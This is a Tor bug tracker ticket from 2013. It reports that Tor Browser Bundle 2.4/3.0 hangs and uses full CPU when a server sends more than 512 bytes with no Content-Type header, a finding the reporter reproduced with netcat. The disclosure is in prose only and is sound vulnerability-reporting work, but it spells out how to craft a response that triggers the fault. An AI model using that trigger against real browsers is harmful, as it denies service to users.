[tor-bugs] #9901 [Tor bundles/installation]: DoS of TBB 2.4/3.0 when no Content-Type header and more than 512 bytes of content are sent

Tor Bug Tracker & Wiki blackhole at torproject.org
Sat Oct 5 07:53:29 UTC 2013 

#9901: DoS of TBB 2.4/3.0 when no Content-Type header and more than 512 bytes of
content are sent
--------------------------------------+-----------------------
 Reporter:  sqrt2                     |          Owner:  erinn
     Type:  defect                    |         Status:  new
 Priority:  normal                    |      Milestone:
Component:  Tor bundles/installation  |        Version:
 Keywords:  tbb dos content-type      |  Actual Points:
Parent ID:                            |         Points:
--------------------------------------+-----------------------
 Following a user question in #tor where the user couldn't open the URL
 <http://cdimage.debian.org/debian-cd/7.1.0/i386/iso-dvd/MD5SUMS> in TBB, I
 decided to investigate the problem by simulating a webserver with netcat.
 (The file loads fine in non-TBB Firefox; the problem exists in both TBB
 beta and alpha, presumably also in stable.) Here are my findings:

  * The above resource is delivered without a Content-Type header by
 cdimage.debian.org.

  * Upon retrieving the resource, Firefox displays a blank page and starts
 consuming 100% CPU (only one core on SMP systems) periodically, backing
 down for a few seconds every now and then.

  * When adding a Content-Type header to the server response, Firefox shows
 the file in the browser (text/plain) or displays the content type warning
 dialog (other content type), as expected.

  * One can remove all headers (not including of course "HTTP/1.0 200 OK")
 and the problem will still occur.

 * The problem stops occurring once 512 bytes or less of content (without
 headers and \n\n) are sent. The content will then be displayed as a text
 file in Firefox.

 * There is no significant change on the wire between the two cases -- the
 reply consists of two TCP packets broken up at the same point.

 In a nutshell, service can be denied by crafting a special server response
 to an ordinary HTTP request. However, because Firefox only consumes 1 core
 and occasionally backs down shortly, the user will likely be able to
 recover from the situation by closing the problematic tab.

-- 
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/9901>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online

More information about the tor-bugs mailing list